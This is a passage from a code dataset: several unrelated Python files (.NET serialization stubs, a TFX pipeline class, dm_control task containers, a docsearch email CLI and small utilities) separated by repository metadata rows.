Indicates the base serializer to use for a root designer object. This class cannot be inherited.
RootDesignerSerializerAttribute(serializerTypeName: str, baseSerializerTypeName: str, reloadable: bool)
RootDesignerSerializerAttribute(serializerType: Type, baseSerializerType: Type, reloadable: bool)
RootDesignerSerializerAttribute(serializerTypeName: str, baseSerializerType: Type, reloadable: bool)
"""
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, serializerType: Type, baseSerializerType: Type, reloadable: bool)
__new__(cls: type, serializerTypeName: str, baseSerializerType: Type, reloadable: bool)
__new__(cls: type, serializerTypeName: str, baseSerializerTypeName: str, reloadable: bool)
"""
pass
Reloadable = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the root serializer supports reloading of the design document without first disposing the designer host.
Get: Reloadable(self: RootDesignerSerializerAttribute) -> bool
"""
SerializerBaseTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the base type of the serializer.
Get: SerializerBaseTypeName(self: RootDesignerSerializerAttribute) -> str
"""
SerializerTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the serializer.
Get: SerializerTypeName(self: RootDesignerSerializerAttribute) -> str
"""
TypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a unique ID for this attribute type.
Get: TypeId(self: RootDesignerSerializerAttribute) -> object
"""
class SerializationStore(object, IDisposable):
""" Provides the base class for storing serialization data for the System.ComponentModel.Design.Serialization.ComponentSerializationService. """
def Close(self):
"""
Close(self: SerializationStore)
Closes the serialization store.
"""
pass
def Dispose(self, *args): # cannot find CLR method
"""
Dispose(self: SerializationStore, disposing: bool)
Releases the unmanaged resources used by the
System.ComponentModel.Design.Serialization.SerializationStore and optionally releases the
managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def Save(self, stream):
"""
Save(self: SerializationStore, stream: Stream)
Saves the store to the given stream.
stream: The stream to which the store will be serialized.
"""
pass
def __enter__(self, *args): # cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): # cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self, *args): # cannot find CLR method
""" __repr__(self: object) -> str """
pass
Errors = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a collection of errors that occurred during serialization or deserialization.
Get: Errors(self: SerializationStore) -> ICollection
"""
| 29.492713 | 221 | 0.636415 | 4,200 | 42,499 | 6.295714 | 0.119524 | 0.026095 | 0.037365 | 0.056047 | 0.480107 | 0.418009 | 0.359163 | 0.311852 | 0.28156 | 0.263823 | 0 | 0.000864 | 0.291983 | 42,499 | 1,440 | 222 | 29.513194 | 0.8779 | 0.584273 | 0 | 0.523256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.302326 | false | 0.302326 | 0 | 0 | 0.476744 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e3b5f9fc04a1987cf911f10cf1100f696aba7419 | 254 | py | Python | sutree/display/__init__.py | thanhit95/pytree | a4db6d975993d53849545dfe8f4dbeae7af1f0b5 | [
"BSD-3-Clause"
] | 3 | 2021-04-26T11:09:40.000Z | 2021-08-07T20:27:57.000Z | sutree/display/__init__.py | thanhit95/sutree | a4db6d975993d53849545dfe8f4dbeae7af1f0b5 | [
"BSD-3-Clause"
] | null | null | null | sutree/display/__init__.py | thanhit95/sutree | a4db6d975993d53849545dfe8f4dbeae7af1f0b5 | [
"BSD-3-Clause"
] | null | null | null | '''
TREE DISPLAY LIBRARY
Description: A utility help visualize trees by using ASCII text.
'''
from .nonbintreedisplay import NonBinTreeDisplay
from .bintreedisplay import BinTreeDisplay
__all__ = [
'NonBinTreeDisplay',
'BinTreeDisplay'
]
| 15.875 | 67 | 0.751969 | 24 | 254 | 7.791667 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177165 | 254 | 15 | 68 | 16.933333 | 0.894737 | 0.350394 | 0 | 0 | 0 | 0 | 0.197452 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e3c1b82e8fd9a26b2b41ba5d62b8e2756c58c22f | 1,519 | py | Python | poppy/transport/base.py | jqxin2006/poppy | 10636e6255c7370172422afece4a5c3d95c1e937 | [
"Apache-2.0"
] | null | null | null | poppy/transport/base.py | jqxin2006/poppy | 10636e6255c7370172422afece4a5c3d95c1e937 | [
"Apache-2.0"
] | null | null | null | poppy/transport/base.py | jqxin2006/poppy | 10636e6255c7370172422afece4a5c3d95c1e937 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class TransportDriverBase(object):
"""Base class for Transport Drivers to document the expected interface.
:param conf: configuration instance
:type conf: oslo.config.cfg.CONF
"""
def __init__(self, conf, manager):
self._conf = conf
self._manager = manager
self._app = None
@property
def app(self):
"""Get app.
:returns app
"""
return self._app
@property
def conf(self):
"""Get conf.
:returns conf
"""
return self._conf
@property
def manager(self):
"""Get manager
:returns manager
"""
return self._manager
@abc.abstractmethod
def listen(self):
"""Start listening for client requests (self-hosting mode).
:raises NotImplementedError
"""
raise NotImplementedError
| 23.015152 | 75 | 0.650428 | 187 | 1,519 | 5.224599 | 0.57754 | 0.061412 | 0.026612 | 0.032753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007162 | 0.264648 | 1,519 | 65 | 76 | 23.369231 | 0.867502 | 0.565504 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.1 | 0 | 0.55 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
e3d1928f47fc3a734aa31744063bfd28f163f2c1 | 116 | py | Python | Week 5: Tuples, for loop, Lists/5 (31).py | MLunov/Python-programming-basics-HSE | 7df8bba105db84d6b932c454fdc39193a648254e | [
"MIT"
] | null | null | null | Week 5: Tuples, for loop, Lists/5 (31).py | MLunov/Python-programming-basics-HSE | 7df8bba105db84d6b932c454fdc39193a648254e | [
"MIT"
] | null | null | null | Week 5: Tuples, for loop, Lists/5 (31).py | MLunov/Python-programming-basics-HSE | 7df8bba105db84d6b932c454fdc39193a648254e | [
"MIT"
] | null | null | null | s = list(map(int, input().split()))
for i in range(1, len(s), 2):
s[i - 1], s[i] = s[i], s[i - 1]
print(*s)
| 23.2 | 36 | 0.465517 | 26 | 116 | 2.076923 | 0.538462 | 0.148148 | 0.111111 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.241379 | 116 | 4 | 37 | 29 | 0.568182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e3d9a5a96c6b53dfa6d9a3c3c753e12901ece292 | 188 | py | Python | Movie-REST-API/movie_api/config.py | ChidinmaKO/Volta | 8193e61d505a651fba5ff7b7902c1cfb473def80 | [
"MIT"
] | null | null | null | Movie-REST-API/movie_api/config.py | ChidinmaKO/Volta | 8193e61d505a651fba5ff7b7902c1cfb473def80 | [
"MIT"
] | null | null | null | Movie-REST-API/movie_api/config.py | ChidinmaKO/Volta | 8193e61d505a651fba5ff7b7902c1cfb473def80 | [
"MIT"
] | null | null | null | import os
class Config:
''' Set Flask configuration variables '''
# general
SECRET_KEY = 'yadayadayada'
# database
SQLALCHEMY_DATABASE_URI = 'sqlite:///data.db'
| 17.090909 | 49 | 0.643617 | 19 | 188 | 6.210526 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 188 | 10 | 50 | 18.8 | 0.836879 | 0.276596 | 0 | 0 | 0 | 0 | 0.226563 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
e3f251d1be9ed543661e2a09dfd0401eca44b108 | 2,055 | py | Python | kmexpert/base/blocks.py | Kaminario/kmexpert | 2b27f83e63a038786750250a77ab276dd903b4d8 | [
"Apache-2.0"
] | null | null | null | kmexpert/base/blocks.py | Kaminario/kmexpert | 2b27f83e63a038786750250a77ab276dd903b4d8 | [
"Apache-2.0"
] | null | null | null | kmexpert/base/blocks.py | Kaminario/kmexpert | 2b27f83e63a038786750250a77ab276dd903b4d8 | [
"Apache-2.0"
] | 1 | 2019-12-26T13:46:51.000Z | 2019-12-26T13:46:51.000Z | #
# (c) 2019 Kaminario Technologies, Ltd.
#
# This software is licensed solely under the terms of the Apache 2.0 license,
# the text of which is available at http://www.apache.org/licenses/LICENSE-2.0.
# All disclaimers and limitations of liability set forth in the Apache 2.0 license apply.
#
import click
from kmexpert.base.prompt_validators import InputValidator
class Notification(object):
def __init__(self, message):
self._message = message
def run(self):
click.echo(" %s" % self._message.replace('\n', '\n '))
class ProcedureStartNotification(object):
def __init__(self, procedure):
self._procedure = procedure
def run(self):
return Notification(self._procedure.name()).run()
class PromptBase(object):
def __init__(self, msg, validator, handler):
self._msg = msg
self._handler = handler
self._validator = validator
self._prompt_res = None
def run(self):
return NotImplemented
def res(self):
"""the result is valid only after running the prompt"""
return self._prompt_res
def history(self):
"""history results are valid only after running the prompt"""
return "%(msg)s: %(res)s" % {'msg': self._msg,
'res': click.style("%s" % self._prompt_res, fg='green')}
class Prompt(PromptBase):
"""Loop until a legal response received"""
def __init__(self, msg, handler):
# type: (str, InputHandler) -> Prompt
super(Prompt, self).__init__(msg=msg,
validator=InputValidator(handler.input_converters()),
handler=handler)
def run(self):
text = click.style(self._msg, fg='green')
while True:
prompt_res = click.prompt(text=text, type=self._validator)
try:
self._prompt_res = self._handler.handle(prompt_res)
return self._prompt_res
except NotImplementedError:
continue
| 30.220588 | 93 | 0.613625 | 238 | 2,055 | 5.109244 | 0.403361 | 0.051809 | 0.053454 | 0.041941 | 0.088816 | 0.059211 | 0.059211 | 0 | 0 | 0 | 0 | 0.00677 | 0.281265 | 2,055 | 67 | 94 | 30.671642 | 0.81652 | 0.223358 | 0 | 0.153846 | 0 | 0 | 0.029262 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25641 | false | 0 | 0.051282 | 0.051282 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
e3f563fad90d39faccab37f0da94936e12a97db5 | 119 | py | Python | 1stSemester_PythonCourse/work5/E06_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | 1stSemester_PythonCourse/work5/E06_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | 1stSemester_PythonCourse/work5/E06_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | a, n = eval(input('please input a, n'))
s = 0
for i in range(1, n+1):
x = int('{}'.format(a)*i)
s += x
print(s) | 19.833333 | 39 | 0.504202 | 26 | 119 | 2.307692 | 0.615385 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.243697 | 119 | 6 | 40 | 19.833333 | 0.633333 | 0 | 0 | 0 | 0 | 0 | 0.158333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e3f8308ce33c62900b89f71eaaba909ee8102e5e | 866 | py | Python | maths/maths1.py | Brannydonowt/PythonBasics | 6ec6501f1eedee725b890685b868941edd940365 | [
"MIT"
] | null | null | null | maths/maths1.py | Brannydonowt/PythonBasics | 6ec6501f1eedee725b890685b868941edd940365 | [
"MIT"
] | null | null | null | maths/maths1.py | Brannydonowt/PythonBasics | 6ec6501f1eedee725b890685b868941edd940365 | [
"MIT"
] | null | null | null | # .py file for python maths exercises
# convert degree to radian
# x * pi/180
# in = 15
# out = 0.2619047619047619
def deg2rad(degrees):
pi = 22/7
return degrees * pi / 180
# convert radian to degree
# in = .52
# out = 29.781818181818185
def rad2deg(rad):
pi = 22/7
return rad / pi * 180
# area of trapezoid
# a = (a+b/2)h
# in = h: 5, a: 5, b: 6
# # out = 27.5
def area_of_trapezoid(a, b, h):
ab = a + b
return (ab / 2) * h
# area of parallelogram
# a = bh
# in = b: 5, h: 6
def area_of_parallelogram(b, h):
return b*h
# surface volume and surface area of cylinder
# a = 2(pi)rh + 2(pi)r^2
# v = (pi)r^2h
# in = h: 4, r: 6
# out a = 377.1428571428571
# out v = 452.57142857142856
def get_volume_surface_of_cylinder(r, h):
pi = 22/7
a = (2 *pi) * r * h + (2 * pi) * (r * r)
print(a)
v = pi * (r * r) * h
print (v) | 20.139535 | 45 | 0.577367 | 159 | 866 | 3.09434 | 0.358491 | 0.060976 | 0.030488 | 0.044715 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173291 | 0.273672 | 866 | 43 | 46 | 20.139535 | 0.608903 | 0.487298 | 0 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0 | 0.058824 | 0.529412 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
540a3ff9d25b58a0b7223f6a74bc6c524b7a5b51 | 1,202 | py | Python | torchsar/sharing/gain_compensation.py | aisari/torchsar | 05a46610d68bc884743a483565279f361ade5384 | [
"Apache-2.0"
] | 3 | 2021-06-04T13:13:07.000Z | 2021-08-24T16:28:31.000Z | torchsar/sharing/gain_compensation.py | aisari/torchsar | 05a46610d68bc884743a483565279f361ade5384 | [
"Apache-2.0"
] | null | null | null | torchsar/sharing/gain_compensation.py | aisari/torchsar | 05a46610d68bc884743a483565279f361ade5384 | [
"Apache-2.0"
] | 2 | 2021-08-15T09:01:03.000Z | 2021-12-21T08:53:53.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2020-03-23 19:28:33
# @Author : Yan Liu & Zhi Liu (zhiliu.mind@gmail.com)
# @Link : http://iridescent.ink
# @Version : $1.0$
from __future__ import division, print_function, absolute_import
import torch as th
from torchsar.utils.const import *
def vga_gain_compensation(S, V, mod='linear', fact=1.0):
r"""vga gain compensation
vga gain compensation
.. math::
\begin{aligned}
{\bm F} &= (λ 10^{{\bm V}/20})\\
{\bm S}_{c} &= {\bm F} \odot {\bm S}
\end{aligned}
Parameters
----------
S : torch tensor
:attr:`S` is an :math:`N_a×N_r×2` array, where, :math:`S[:,:,0]` is the I signal
and :math:`S[:,:,1]` is the Q signal.
V : torch tensor
:attr:`S` is an :math:`N_a×N_r` or :math:`N_a×1` VGA gain array, the gain values are in
``dB`` unit.
mod : str, optional
compensation mode (the default is 'linear')
fact : number, optional
fact is the factor :math:`\lambda` (the default is 1.0)
Returns
-------
torch tensor
compensated signal, :math:`N_a×N_r×2` array.
"""
raise TypeError('Not opened yet!')
| 27.953488 | 95 | 0.574875 | 189 | 1,202 | 3.603175 | 0.52381 | 0.041116 | 0.035242 | 0.041116 | 0.118943 | 0.118943 | 0.118943 | 0.118943 | 0.118943 | 0.085169 | 0 | 0.033445 | 0.253744 | 1,202 | 42 | 96 | 28.619048 | 0.719064 | 0.72213 | 0 | 0 | 0 | 0 | 0.091304 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.5 | 0 | 0.666667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
541b595479d707f01a4c8e7555e5488ff70e9a84 | 2,321 | py | Python | tfx/orchestration/pipeline.py | ashahba/tfx | 964ed7e06f9904d3be81d01ab76ffbb148123712 | [
"Apache-2.0"
] | 1 | 2019-04-05T19:39:53.000Z | 2019-04-05T19:39:53.000Z | tfx/orchestration/pipeline.py | ashahba/tfx | 964ed7e06f9904d3be81d01ab76ffbb148123712 | [
"Apache-2.0"
] | null | null | null | tfx/orchestration/pipeline.py | ashahba/tfx | 964ed7e06f9904d3be81d01ab76ffbb148123712 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition and related classes for TFX pipeline."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import functools
class PipelineDecorator(object):
"""Pipeline decorator that has pipeline-level specification."""
def __init__(self, **kwargs):
self._pipeline = self._new_pipeline(**kwargs)
# TODO(b/126411144): Come up with a better style to construct TFX pipeline.
def __call__(self, func):
@functools.wraps(func)
def decorated():
self._pipeline.components = func()
return self._pipeline
return decorated
def _new_pipeline(self, **kwargs):
return Pipeline(**kwargs)
class Pipeline(object):
"""Logical TFX pipeline object.
Args: kwargs that will be used to create real pipeline implementation.
Attributes:
pipeline_args: kwargs used to create real pipeline implementation. This is
forwarded to PipelineRunners instead of consumed in this class. This
should include:
- pipeline_name: Required. The unique name of this pipeline.
- pipeline_root: Required. The root of the pipeline outputs.
- other args are optional.
components: logical components of this pipeline.
"""
def __init__(self, pipeline_name, pipeline_root, **kwargs):
# TODO(b/126565661): Add more documentation on this.
self.pipeline_args = kwargs
self.pipeline_args.update({
'pipeline_name': pipeline_name,
'pipeline_root': pipeline_root
})
self._components = []
@property
def components(self):
return self._components
@components.setter
def components(self, components):
self._components = components
| 31.364865 | 78 | 0.736321 | 300 | 2,321 | 5.523333 | 0.456667 | 0.03621 | 0.038624 | 0.019312 | 0.045866 | 0.045866 | 0 | 0 | 0 | 0 | 0 | 0.013778 | 0.186988 | 2,321 | 73 | 79 | 31.794521 | 0.864335 | 0.558811 | 0 | 0 | 0 | 0 | 0.026721 | 0 | 0 | 0 | 0 | 0.027397 | 0 | 1 | 0.233333 | false | 0 | 0.166667 | 0.066667 | 0.6 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
54265cf5948ec969d2cf73c9f3e278607091cfee | 3,633 | py | Python | dm_control/utils/containers.py | dingyiming0427/dm_control | 4e9c3a0c91002ac49308faf6c61aa3ddad2ef548 | [
"Apache-2.0"
] | 75 | 2020-11-30T07:59:09.000Z | 2022-03-30T21:26:53.000Z | dm_control/utils/containers.py | dingyiming0427/dm_control | 4e9c3a0c91002ac49308faf6c61aa3ddad2ef548 | [
"Apache-2.0"
] | 12 | 2021-02-02T09:03:44.000Z | 2022-03-29T19:17:39.000Z | dm_control/utils/containers.py | dingyiming0427/dm_control | 4e9c3a0c91002ac49308faf6c61aa3ddad2ef548 | [
"Apache-2.0"
] | 18 | 2020-12-04T03:48:34.000Z | 2022-03-21T15:10:08.000Z | # Copyright 2017 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Container classes used in control domains."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
_NAME_ALREADY_EXISTS = (
"A function named {name!r} already exists in the container and "
"`allow_overriding_keys` is False.")
class TaggedTasks(collections.Mapping):
"""Maps task names to their corresponding factory functions with tags.
To store a function in a `TaggedTasks` container, we can use its `.add`
decorator:
```python
tasks = TaggedTasks()
@tasks.add('easy', 'stable')
def example_task():
...
return environment
environment_factory = tasks['example_task']
# Or to restrict to a given tag:
environment_factory = tasks.tagged('easy')['example_task']
```
"""
def __init__(self, allow_overriding_keys=False):
"""Initializes a new `TaggedTasks` container.
Args:
allow_overriding_keys: Boolean, whether `add` can override existing keys
within the container. If False (default), calling `add` multiple times
with the same function name will result in a `ValueError`.
"""
self._tasks = collections.OrderedDict()
self._tags = collections.defaultdict(dict)
self.allow_overriding_keys = allow_overriding_keys
def add(self, *tags):
"""Decorator that adds a factory function to the container with tags.
Args:
*tags: Strings specifying the tags for this function.
Returns:
The same function.
Raises:
ValueError: if a function with the same name already exists within the
container and `allow_overriding_keys` is False.
"""
def wrap(factory_func):
name = factory_func.__name__
if name in self and not self.allow_overriding_keys:
raise ValueError(_NAME_ALREADY_EXISTS.format(name=name))
self._tasks[name] = factory_func
for tag in tags:
self._tags[tag][name] = factory_func
return factory_func
return wrap
def tagged(self, *tags):
"""Returns a (possibly empty) dict of functions matching all the given tags.
Args:
*tags: Strings specifying tags to query by.
Returns:
A dict of `{name: function}` containing all the functions that are tagged
by all of the strings in `tags`.
"""
if not tags:
return {}
tags = set(tags)
if not tags.issubset(six.viewkeys(self._tags)):
return {}
names = six.viewkeys(self._tags[tags.pop()])
while tags:
names &= six.viewkeys(self._tags[tags.pop()])
return {name: self._tasks[name] for name in names}
def tags(self):
"""Returns a list of all the tags in this container."""
return list(self._tags.keys())
def __getitem__(self, k):
return self._tasks[k]
def __iter__(self):
return iter(self._tasks)
def __len__(self):
return len(self._tasks)
def __repr__(self):
return "{}({})".format(self.__class__.__name__, str(self._tasks))
| 30.024793 | 80 | 0.682631 | 483 | 3,633 | 4.94824 | 0.343685 | 0.026778 | 0.055649 | 0.02887 | 0.084519 | 0.060251 | 0.060251 | 0.03431 | 0 | 0 | 0 | 0.002771 | 0.20534 | 3,633 | 120 | 81 | 30.275 | 0.825078 | 0.534269 | 0 | 0.046512 | 0 | 0 | 0.065499 | 0.014916 | 0 | 0 | 0 | 0 | 0 | 1 | 0.209302 | false | 0 | 0.116279 | 0.093023 | 0.581395 | 0.023256 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
54289f2499e993f34311ecec7045993cbd24bc10 | 408 | py | Python | is_core/forms/utils.py | zzuzzy/django-is-core | 3f87ec56a814738683c732dce5f07e0328c2300d | [
"BSD-3-Clause"
] | null | null | null | is_core/forms/utils.py | zzuzzy/django-is-core | 3f87ec56a814738683c732dce5f07e0328c2300d | [
"BSD-3-Clause"
] | null | null | null | is_core/forms/utils.py | zzuzzy/django-is-core | 3f87ec56a814738683c732dce5f07e0328c2300d | [
"BSD-3-Clause"
] | null | null | null | def add_class_name(attrs, class_name):
class_names = attrs.get('class')
if class_names:
class_names = [class_names]
else:
class_names = []
class_names.append(class_name)
attrs['class'] = ' '.join(class_names)
return attrs
class ReadonlyValue:
def __init__(self, value, humanized_value):
self.value = value
self.humanized_value = humanized_value
| 24 | 47 | 0.661765 | 50 | 408 | 5.04 | 0.34 | 0.277778 | 0.178571 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237745 | 408 | 16 | 48 | 25.5 | 0.810289 | 0 | 0 | 0 | 0 | 0 | 0.026961 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
5807f31f504be56c6c5ddac227f47052a6a4ecfb | 1,540 | py | Python | cli/src/commands/modify_emails.py | mikiec84/docsearch-scraper | 08aa90ee9bf91b3e5e3e0d383e4d1b4d284c56b8 | [
"MIT"
] | 1 | 2020-11-09T21:06:27.000Z | 2020-11-09T21:06:27.000Z | cli/src/commands/modify_emails.py | mikiec84/docsearch-scraper | 08aa90ee9bf91b3e5e3e0d383e4d1b4d284c56b8 | [
"MIT"
] | 4 | 2021-03-31T19:59:26.000Z | 2022-03-02T15:02:55.000Z | cli/src/commands/modify_emails.py | gaybro8777/docsearch-scraper | 08aa90ee9bf91b3e5e3e0d383e4d1b4d284c56b8 | [
"MIT"
] | null | null | null | import os
from os import path
import subprocess as sp
from deployer.src.emails import add, delete
from .abstract_command import AbstractCommand
def _ensure_configs_private():
# Check the presence of configs-private or clone it.
p = '/tmp/docsearch_deploy/scraper/deployer'
try:
os.makedirs(p)
except OSError:
pass
old_dir = os.getcwd()
os.chdir(p)
if not path.isdir('private'):
sp.call(['git', 'clone', '--depth', '1', '--branch', 'master',
'git@github.com:algolia/docsearch-configs-private.git',
'private'])
os.chdir(old_dir)
return p
class UpdateEmails(AbstractCommand):
def get_name(self):
return 'emails:update'
def get_description(self):
return 'Add or update contact emails'
def get_options(self):
return [{'name': 'configs...', 'description': 'name of the docsearch you want to update contact emails'}]
def run(self, args):
p = _ensure_configs_private()
for config in args:
add(config, path.join(p, 'private'))
class DeleteEmails(AbstractCommand):
def get_name(self):
return 'emails:delete'
def get_description(self):
return 'Delete contact emails'
def get_options(self):
return [{'name': 'configs...', 'description': 'name of the docsearch you want to delete contact emails'}]
def run(self, args):
p = _ensure_configs_private()
for config in args:
delete(config, path.join(p, 'private'))
